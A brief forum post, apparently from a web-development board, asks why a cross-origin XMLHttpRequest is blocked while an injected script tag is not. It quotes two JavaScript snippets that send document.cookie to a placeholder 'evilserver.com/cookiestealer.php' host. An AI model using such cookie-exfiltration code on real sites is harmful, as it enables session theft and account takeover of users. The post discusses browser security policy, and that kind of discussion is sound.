I've just had an interesting question put to me: why isblocked from a different server, but:Code:var a = new XMLHttpRequest(); a.open("GET", "http://www.evilserver.com/cookiestealer.php?cookie=" + encodeURIComponent(document.cookie), true);not?Code:var a = document.getElementsByTagName("head")[0].appendChild( document.createElement("script") ); a.type = "text/javascript"; a.src = "http://www.evilserver.com/cookiestealer.php?cookie=" + encodeURIComponent(document.cookie);



Reply With Quote

Bookmarks